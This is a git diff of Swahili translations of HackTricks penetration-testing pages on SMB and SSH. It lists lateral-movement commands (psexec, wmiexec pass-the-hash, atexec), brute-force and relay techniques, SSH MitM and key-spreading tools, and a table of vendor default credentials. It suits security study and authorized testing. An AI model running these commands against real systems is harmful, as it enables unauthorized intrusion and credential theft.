{{#endref}}
## **Tekeleza Amri**
### **crackmapexec**
crackmapexec inaweza kutekeleza amri kwa **kutumia** mojawapo ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo njia ya **chaguo-msingi**. Unaweza kubainisha ni chaguo gani unazopendelea kutumia kwa kipengeo `--exec-method`:
crackmapexec inaweza kutekeleza amri **kutumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ni njia ya **chaguo-msingi**. Unaweza kubainisha chaguo unachopendelea kutumia kwa parameter `--exec-method`:
```bash
apt-get install crackmapexec
@ -381,9 +393,9 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
Chaguzi zote mbili zitaunda **service mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathiri na kuitumia **kutekeleza kitu** (**psexec** itafanya **upload** faili inayotekelezeka kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka kwenye arguments payload --**file-less technique-**-).\
**Taarifa zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
Zote mbili zitaunda **huduma mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathirika na kuitumia **kutekeleza kitu** (**psexec** itafanya **upload** faili ya executable kwenye share ya ADMIN$ na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka katika arguments payload --**file-less technique-**-).\
**Taarifa zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Kwenye **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
@ -391,19 +403,19 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM**
Kwa kutumia **parameter**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
Endesha kwa siri shell ya amri bila kugusa diski au kuendesha huduma mpya ukitumia DCOM kupitia **port 135.**\
Katika **kali** inapatikana kwenye /usr/share/doc/python3-impacket/examples/
Fanya kwa kificho utekelezaji wa shell ya amri bila kugusa diski au kuanzisha huduma mpya ukitumia DCOM kupitia **port 135.**\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Kwa kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
Kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
@ -412,7 +424,7 @@ Kwa kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTL
```
### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
Tekeleza amri kupitia Task Scheduler (ukitumia _\pipe\atsvc_ kupitia SMB).\
Endesha amri kupitia Task Scheduler (ukitumia _\pipe\atsvc_ kupitia SMB).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
@ -422,36 +434,36 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
### ksmbd eneo la mashambulizi na SMB2/SMB3 protocol fuzzing (syzkaller)
### Uso wa mashambulizi wa ksmbd na fuzzing ya protocol ya SMB2/SMB3 (syzkaller)
{{#ref}}
ksmbd-attack-surface-and-fuzzing-syzkaller.md
{{#endref}}
## **Bruteforce watumiaji credentials**
## **Bruteforce credentials za watumiaji**
**Hii haipendekezwi — unaweza kuzuia akaunti ikiwa utazidi idadi ya jaribio zinazoruhusiwa**
**Hii haipendekezwi, unaweza kuzuia akaunti ikiwa utaizidi idadi ya majaribio iliyoruhusiwa**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB relay attack
Shambulio hili linatumia Responder toolkit kunasa **kikao za uthibitishaji za SMB** kwenye mtandao wa ndani, na **kuzirusha** kwa **mashine lengwa**. Ikiwa **kikao cha uthibitishaji kimefanikiwa**, kitatupa moja kwa moja kwenye **system** **shell**.\
Shambulio hili linatumia Responder toolkit ili **capture SMB authentication sessions** kwenye mtandao wa ndani, na **relays** kwa **target machine**. Ikiwa authentication **session** itafanyika kwa mafanikio, itakuingiza moja kwa moja ndani ya **system** **shell**.\
[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Maktaba ya Windows URLMon.dll hujaribu kwa otomatiki kuthibitisha kwa mwenyeji wakati ukurasa unapotaka kufikia baadhi ya yaliyomo kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
Maktaba ya Windows URLMon.dll hujaribu kwa otomatiki authenticate kwa host wakati ukurasa unajaribu kufikia baadhi ya content kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
Hii hutokea kwa functions zifuatazo:
Hii hutokea na functions zifuatazo:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Ambazo hutumika na baadhi ya browsers na tools (like Skype)
Ambazo zinatumiwa na baadhi ya browsers na tools (kama Skype)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>)
@ -461,11 +473,11 @@ Ambazo hutumika na baadhi ya browsers na tools (like Skype)
## NTLM Theft
Sawa na SMB Trapping, kuweka faili zenye madhara kwenye mfumo lengwa (kwa mfano kupitia SMB) kunaweza kusababisha jaribio la uthibitishaji la SMB, na kuruhusu hash ya NetNTLMv2 kunaswa kwa kutumia zana kama Responder. Hash hiyo inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack).
Similar to SMB Trapping, kuweka faili zenye madhara kwenye target system (kupitia SMB, kwa mfano) kunaweza kusababisha jaribio la SMB authentication, kuruhusu NetNTLMv2 hash kukamatwa na tool kama Responder. Hash inaweza kisha ku crack offline au kutumika katika an [SMB relay attack](#smb-relay-attack).
[See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
## HackTricks Amri za Otomatiki
## HackTricks Automatic Commands
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
@ -498,8 +510,8 @@ getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
@ -534,4 +546,10 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
## Marejeo
- [NetExec (CME) wiki Kerberos usage](https://www.netexec.wiki/)
- [Pentesting Kerberos (88) client setup and troubleshooting](../pentesting-kerberos-88/README.md)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
{{#include ../../banners/hacktricks-training.md}}

218
src/network-services-pentesting/pentesting-ssh.md
View File

@ -2,27 +2,27 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
## Taarifa za Msingi
**SSH (Secure Shell au Secure Socket Shell)** ni protokali ya mtandao inayowezesha muunganisho salama kwa kompyuta kupitia mtandao usio salama. Ni muhimu kwa kudumisha usiri na uadilifu wa data unapofikia mifumo ya mbali.
**SSH (Secure Shell or Secure Socket Shell)** ni itifaki ya mtandao inayowezesha muunganisho salama kwa kompyuta kupitia mtandao usio salama. Ni muhimu kwa kudumisha usiri na uadilifu wa data unapoingia kwenye mifumo ya mbali.
**Bandari ya kawaida:** 22
**Bandari ya chaguo-msingi:** 22
```
22/tcp open ssh syn-ack
```
**SSH servers:**
**Seva za SSH:**
- [openSSH](http://www.openssh.org) OpenBSD SSH, iliyotolewa katika BSD, usambazaji wa Linux na Windows tangu Windows 10
- [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) utekelezaji wa SSH kwa mazingira yenye kumbukumbu na rasilimali za processor za chini, iliyotolewa katika OpenWrt
- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) utekelezaji wa SSH kwa Windows, mteja hutumiwa mara nyingi lakini matumizi ya seva ni nadra
- [openSSH](http://www.openssh.org) OpenBSD SSH, inayopatikana katika BSD, distributions za Linux na Windows tangu Windows 10
- [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) Utekelezaji wa SSH kwa mazingira yenye kumbukumbu ndogo na rasilimali za prosesa, hutolewa katika OpenWrt
- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) Utekelezaji wa SSH kwa Windows; mteja hutumika sana lakini matumizi ya seva ni nadra
- [CopSSH](https://www.itefix.net/copssh) utekelezaji wa OpenSSH kwa Windows
**SSH libraries (implementing server-side):**
**Maktaba za SSH (kutekeleza upande wa seva):**
- [libssh](https://www.libssh.org) maktaba ya C ya majukwaa mengi inayotekeleza protokali ya SSHv2 ikiwa na viambatisho katika [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) na [R](https://github.com/ropensci/ssh); inatumika na KDE kwa sftp na na GitHub kwa miundombinu ya git SSH
- [wolfSSH](https://www.wolfssl.com/products/wolfssh/) maktaba ya seva ya SSHv2 iliyoandikwa kwa ANSI C na iliyolengwa kwa mazingira yaliyo na rasilimali chache, RTOS, na zilizozuiliwa
- [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) maktaba ya Apache SSHD ya java inategemea Apache MINA
- [paramiko](https://github.com/paramiko/paramiko) maktaba ya protokali ya Python SSHv2
- [libssh](https://www.libssh.org) maktaba ya C ya multiplatform inayotekeleza protocol ya SSHv2 na bindings katika [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) na [R](https://github.com/ropensci/ssh); inatumika na KDE kwa sftp na pia na GitHub kwa miundombinu ya git SSH
- [wolfSSH](https://www.wolfssl.com/products/wolfssh/) maktaba ya seva ya SSHv2 iliyoandikwa kwa ANSI C na iliyolengwa kwa vifaa vya embedded, RTOS, na mazingira yenye rasilimali ndogo
- [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) maktaba ya Apache SSHD ya Java inategemea Apache MINA
- [paramiko](https://github.com/paramiko/paramiko) maktaba ya Python ya protocol ya SSHv2
## Enumeration
@ -30,25 +30,25 @@
```bash
nc -vn <IP> 22
```
### Automated ssh-audit
### Otomatiki ssh-audit
ssh-audit ni chombo cha ukaguzi wa usanidi wa ssh server na mteja.
ssh-audit ni chombo cha ukaguzi wa usanidi wa seva na mteja wa SSH.
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) ni toleo lililosasishwa kutoka [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) ni fork iliyosasishwa kutoka [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
**Features:**
**Vipengele:**
- Msaada wa protokali za SSH1 na SSH2;
- changanua usanidi wa mteja wa SSH;
- pata banner, tambua kifaa au programu na mfumo wa uendeshaji, gundua compression;
- kusanya funguo za kubadilishana, funguo za mwenyeji, algorithms za encryption na code za uthibitishaji wa ujumbe;
- toa taarifa za algorithm (zinapatikana tangu, zimetolewa/kuzima, zisizo salama/dhaifu/mzee, nk);
- toa mapendekezo ya algorithm (ongeza au ondoa kulingana na toleo la programu lililotambuliwa);
- toa taarifa za usalama (masuala yanayohusiana, orodha ya CVE iliyotolewa, nk);
- changanua ulinganifu wa toleo la SSH kulingana na taarifa za algorithm;
- Msaada wa seva kwa itifaki za SSH1 na SSH2;
- kuchambua usanidi wa mteja wa SSH;
- kupata banner, kutambua kifaa au programu na mfumo wa uendeshaji, kugundua compression;
- kusanya key-exchange, host-key, encryption na message authentication code algoritimu;
- tolea taarifa za algoritimu (inapatikana tangu, imeondolewa/imezimwa, hatari/dhaifu/ya zamani, n.k.);
- tolea mapendekezo ya algoritimu (ongeza au ondoa kulingana na toleo la programu lililotambuliwa);
- tolea taarifa za usalama (masuala yanayohusiana, orodha ya CVE zilizotolewa, n.k.);
- kuchambua utangamano wa toleo la SSH kulingana na taarifa za algoritimu;
- taarifa za kihistoria kutoka OpenSSH, Dropbear SSH na libssh;
- inafanya kazi kwenye Linux na Windows;
- haina utegemezi
- hakuna utegemezi
```bash
usage: ssh-audit.py [-1246pbcnjvlt] <host>
@ -69,17 +69,17 @@ use -t to change timeout)
(default: 5)
$ python3 ssh-audit <IP>
```
[See it in action (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
[Tazama inavyofanya kazi (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
### Funguo za SSH za umma za seva
### Ufunguo wa umma wa SSH wa server
```bash
ssh-keyscan -t rsa <IP> -p <PORT>
```
### Algorithimu za Cipher Zenye Ukatili
### Algoritimu dhaifu za cipher
Hii inagundulika kwa default na **nmap**. Lakini unaweza pia kutumia **sslcan** au **sslyze**.
Hii inagunduliwa kwa chaguo-msingi na **nmap**. Lakini unaweza pia kutumia **sslcan** au **sslyze**.
### Skripti za Nmap
### Scripts za Nmap
```bash
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
@ -95,27 +95,28 @@ nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check a
### Username Enumeration
Katika toleo fulani la OpenSSH unaweza kufanya shambulio la muda ili kuhesabu watumiaji. Unaweza kutumia moduli ya metasploit ili kutumia hii:
Katika baadhi ya matoleo ya OpenSSH unaweza kufanya timing attack ili enumerate users. Unaweza kutumia metasploit module ili ku-exploit hili:
```
msf> use scanner/ssh/ssh_enumusers
```
### [Brute force](../generic-hacking/brute-force.md#ssh)
Baadhi ya akisi za kawaida za ssh [hapa](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt) na [hapa](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) na chini.
Baadhi ya ssh credentials zifuatazo ziko [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) na hapa chini.
### Private Key Brute Force
Ikiwa unajua baadhi ya funguo za kibinafsi za ssh ambazo zinaweza kutumika... hebu jaribu. Unaweza kutumia skripti ya nmap:
Ikiwa unajua baadhi ya ssh private keys ambazo zinaweza kutumika... tujaribu. Unaweza kutumia nmap script:
```
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
```
Au moduli wa msaada wa MSF:
Au MSF auxiliary module:
```
msf> use scanner/ssh/ssh_identify_pubkeys
```
Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms enabled): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
Au tumia `ssh-keybrute.py` (inaendeshwa na python3, nyepesi na ina legacy algorithms zimeshwezeshwa): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
#### badkeys zilizojulikana zinaweza kupatikana hapa:
#### Known badkeys can be found here:
{{#ref}}
https://github.com/rapid7/ssh-badkeys/tree/master/authorized
@ -123,22 +124,41 @@ https://github.com/rapid7/ssh-badkeys/tree/master/authorized
#### Weak SSH keys / Debian predictable PRNG
Baadhi ya mifumo yana kasoro zinazojulikana katika mbegu ya nasibu inayotumika kuunda vifaa vya kificho. Hii inaweza kusababisha kupungua kwa kiwango cha funguo ambacho kinaweza kufanywa kwa nguvu. Seti za funguo zilizoundwa awali kwenye mifumo ya Debian iliyoathiriwa na PRNG dhaifu zinapatikana hapa: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
Baadhi ya mifumo zina dosari zilizo wazi kwenye random seed inayotumika kuzalisha cryptographic material. Hii inaweza kusababisha keyspace iliyopunguzwa kwa kiasi kikubwa ambayo inaweza kufunguliwa kwa bruteforce. Seti zilizotayarishwa awali za keys zilizozalishwa kwenye Debian systems zilizoathiriwa na weak PRNG zinapatikana hapa: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
Unapaswa kutazama hapa ili kutafuta funguo halali za mashine ya mwathirika.
Unapaswa kuangalia hapa ili kutafuta keys halali za mashine ya mwathiriwa.
### Kerberos
### Kerberos / GSSAPI SSO
**crackmapexec** kutumia itifaki ya `ssh` inaweza kutumia chaguo `--kerberos` ili **kujiandikisha kupitia kerberos**.\
Kwa maelezo zaidi, endesha `crackmapexec ssh --help`.
If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate using your Kerberos TGT instead of a password.
## Default Credentials
Mtiririko wa kazi kutoka kwenye mwenyeji wa mshambuliaji wa Linux:
```bash
# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# 2) Generate a krb5.conf for the target realm (optional, but handy)
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
# 3) Obtain a TGT for the user
kinit <user>
klist
# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
```
Notes:
- Ikiwa unajiunga kwa jina lisilo sahihi (kwa mfano, short host, alias, au mpangilio usio sahihi katika `/etc/hosts`), unaweza kupata: "Server not found in Kerberos database" kwa sababu SPN haitalingana.
- `crackmapexec ssh --kerberos` pia inaweza kutumia ccache yako kwa Kerberos auth.
## Nenosiri za Chaguo-msingi
| **Vendor** | **Usernames** | **Passwords** |
| ---------- | ----------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
@ -153,43 +173,43 @@ Kwa maelezo zaidi, endesha `crackmapexec ssh --help`.
## SSH-MitM
Ikiwa uko kwenye mtandao wa ndani kama mwathirika ambaye atajiunga na seva ya SSH kwa kutumia jina la mtumiaji na nenosiri, unaweza kujaribu **kufanya shambulio la MitM ili kuiba akreditivu hizo:**
Ikiwa uko kwenye mtandao wa ndani na ni mwathirika ambaye anataka kuungana na server ya SSH kwa kutumia username na password unaweza kujaribu **kufanya shambulio la MitM ili kuiba taarifa hizo za kuingia:**
**Njia ya shambulio:**
- **Uelekezaji wa Trafiki:** Mshambuliaji **anahamisha** trafiki ya mwathirika kwenye mashine yao, kwa ufanisi **akikamata** jaribio la kuungana na seva ya SSH.
- **Kukamata na Kurekodi:** Mashine ya mshambuliaji inafanya kazi kama **proxy**, **ikikamata** maelezo ya kuingia ya mtumiaji kwa kujifanya kuwa seva halali ya SSH.
- **Utendaji wa Amri na Uhamasishaji:** Hatimaye, seva ya mshambuliaji **inakumbuka akreditivu za mtumiaji**, **inasambaza amri** kwa seva halisi ya SSH, **inafanya** hizo, na **inatuma matokeo nyuma** kwa mtumiaji, ikifanya mchakato huo kuonekana kuwa wa kawaida na halali.
- **Traffic Redirection:** Mshambuliaji **huielekeza** trafiki ya mwathirika kwenye mashine yao, kwa hivyo kwa ufanisi **huchukua** jaribio la kuunganishwa na server ya SSH.
- **Interception and Logging:** Mashine ya mshambuliaji inafanya kazi kama **proxy**, ikiwa **inakamata** maelezo ya kuingia ya mtumiaji kwa kujifanya kuwa server halali ya SSH.
- **Command Execution and Relay:** Hatimaye, server ya mshambuliaji **inarekodi nywila za mtumiaji**, **inatuma amri** kwa server halisi ya SSH, **inaziendesha**, na **inarejesha matokeo** kwa mtumiaji, na kufanya mchakato uonekane laini na halali.
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) inafanya hasa kile kilichoelezwa hapo juu.
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) inafanya kabisa kile kilichoelezwa hapo juu.
Ili kukamata kufanya MitM halisi unaweza kutumia mbinu kama ARP spoofing, DNS spoofing au nyingine zilizoelezwa katika [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing).
Ili kutekeleza MitM halisi unaweza kutumia mbinu kama ARP spoofing, DNS spoofin au nyingine zilizoelezewa katika [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing).
## SSH-Snake
Ikiwa unataka kupita mtandao kwa kutumia funguo za kibinafsi za SSH zilizogunduliwa kwenye mifumo, ukitumia kila funguo ya kibinafsi kwenye kila mfumo kwa ajili ya mwenyeji mpya, basi [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) ndiyo unayohitaji.
Ikiwa unataka kusafiri kupitia mtandao ukitumia SSH private keys ulizogundua kwenye mifumo, ukitumia kila private key kwenye kila mfumo kwa ajili ya hosts mpya, basi [**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) ndiyo unayohitaji.
SSH-Snake inatekeleza kazi zifuatazo kiotomatiki na kwa kurudiarudia:
SSH-Snake inatekeleza majukumu yafuatayo kimitambo na kirekurensi:
1. Kwenye mfumo wa sasa, pata funguo zozote za kibinafsi za SSH,
2. Kwenye mfumo wa sasa, pata mwenyeji au marudio yoyote (mtumiaji@kuhost) ambayo funguo za kibinafsi zinaweza kukubaliwa,
3. Jaribu kuingia SSH kwenye marudio yote kwa kutumia funguo zote za kibinafsi zilizogunduliwa,
4. Ikiwa marudio yameunganishwa kwa mafanikio, rudia hatua #1 - #4 kwenye mfumo uliounganishwa.
1. Kwenye mfumo wa sasa, tafuta vifunguo vya kibinafsi vya SSH,
2. Kwenye mfumo wa sasa, tafuta hosts au destinations (user@host) ambazo vifunguo vinaweza kukubaliwa,
3. Jaribu ku-SSH kwenye destinations zote ukitumia vifunguo vyote vilivyogunduliwa,
4. Ikiwa destination imefanikiwa kuunganishwa, irudia hatua #1 - #4 kwenye mfumo uliounganishwa.
Ni ya kujirudia kabisa na kujiendeleza -- na haina faili kabisa.
Ni yenye uwezo wa kujirudia na kujieneza yenyewe kabisa -- na haina faili kabisa (completely fileless).
## Config Misconfigurations
## Mipangilio Isiyofaa
### Root login
Ni kawaida kwa seva za SSH kuruhusu kuingia kwa mtumiaji wa root kwa default, ambayo inatoa hatari kubwa ya usalama. **Kuzima kuingia kwa root** ni hatua muhimu katika kulinda seva. Upatikanaji usioidhinishwa na mamlaka ya utawala na mashambulizi ya nguvu yanaweza kupunguziliwa mbali kwa kufanya mabadiliko haya.
Ni kawaida kwa server za SSH kuruhusu kuingia kwa mtumiaji root kwa chaguo-msingi, jambo ambalo ni hatari kubwa ya usalama. **Kuizima root login** ni hatua muhimu katika kuimarisha server. Ufikiaji usioidhinishwa kwa vibali vya utawala na mashambulio ya brute force yanaweza kupunguzwa kwa kufanya mabadiliko haya.
**Ili Kuzima Kuingia kwa Root katika OpenSSH:**
To Disable Root Login in OpenSSH:
1. **Hariri faili ya usanidi ya SSH** kwa: `sudoedit /etc/ssh/sshd_config`
2. **Badilisha mipangilio** kutoka `#PermitRootLogin yes` hadi **`PermitRootLogin no`**.
3. **Reload usanidi** kwa kutumia: `sudo systemctl daemon-reload`
4. **Restart seva ya SSH** ili kutekeleza mabadiliko: `sudo systemctl restart sshd`
1. **Edit the SSH config file** with: `sudoedit /etc/ssh/sshd_config`
2. **Change the setting** from `#PermitRootLogin yes` to **`PermitRootLogin no`**.
3. **Reload the configuration** using: `sudo systemctl daemon-reload`
4. **Restart the SSH server** to apply changes: `sudo systemctl restart sshd`
### SFTP Brute Force
@ -197,9 +217,9 @@ Ni kawaida kwa seva za SSH kuruhusu kuingia kwa mtumiaji wa root kwa default, am
### SFTP command execution
Kuna makosa ya kawaida yanayotokea na mipangilio ya SFTP, ambapo wasimamizi wanakusudia kwa watumiaji kubadilishana faili bila kuwezesha ufikiaji wa shell ya mbali. Licha ya kuweka watumiaji na shells zisizoingiliana (k.m., `/usr/bin/nologin`) na kuwafunga kwenye directory maalum, kuna pengo la usalama. **Watumiaji wanaweza kupita vizuizi hivi** kwa kuomba utekelezaji wa amri (kama `/bin/bash`) mara tu baada ya kuingia, kabla shell yao isiyoingiliana haijachukua. Hii inaruhusu utekelezaji wa amri zisizoidhinishwa, ikikandamiza hatua za usalama zilizokusudiwa.
Kuna upotevu wa usalama unaotokea mara kwa mara katika maandalizi ya SFTP, ambapo watawala wanakusudia watumiaji kubadilishana faili bila kuwezesha ufikiaji wa shell ya mbali. Licha ya kuweka watumiaji na shells zisizo za mwingiliano (kwa mfano, `/usr/bin/nologin`) na kuwapangia kwenye saraka maalum, kuna mgongano wa usalama. **Watumiaji wanaweza kuepuka vikwazo hivi** kwa kuomba utekelezaji wa amri (kama `/bin/bash`) mara tu baada ya kuingia, kabla shell yao isiyo ya mwingiliano haijachukua nafasi. Hii inaruhusu utekelezaji wa amri bila idhini, na kuharibu hatua za usalama zilizokusudiwa.
[Esampuli kutoka hapa](https://community.turgensec.com/ssh-hacking-guide/):
[Example from here](https://community.turgensec.com/ssh-hacking-guide/):
```bash
ssh -v noraj@192.168.1.94 id
...
@ -232,42 +252,42 @@ PermitTunnel no
X11Forwarding no
PermitTTY no
```
Hii usanidi itaruhusu tu SFTP: kuzuia ufikiaji wa shell kwa kulazimisha amri ya kuanzisha na kuzuia ufikiaji wa TTY lakini pia kuzuia aina zote za upitishaji bandari au tunneling.
Usanidi huu utaruhusu SFTP pekee: unazuia ufikiaji wa shell kwa kulazimisha start command na kuzuia ufikiaji wa TTY, lakini pia unazuia aina zote za port forwarding au tunneling.
### SFTP Tunneling
Ikiwa una ufikiaji wa seva ya SFTP unaweza pia kupitisha trafiki yako kupitia hii kwa mfano ukitumia upitishaji bandari wa kawaida:
Ikiwa una ufikiaji wa seva ya SFTP, unaweza pia tunnel trafiki yako kupitia hii — kwa mfano kwa kutumia port forwarding ya kawaida:
```bash
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
```
### SFTP Symlink
The **sftp** have the command "**symlink**". Therefor, if you have **writable rights** in some folder, you can create **symlinks** of **other folders/files**. As you are probably **trapped** inside a chroot this **won't be specially useful** for you, but, if you can **access** the created **symlink** from a **no-chroot** **service** (for example, if you can access the symlink from the web), you could **open the symlinked files through the web**.
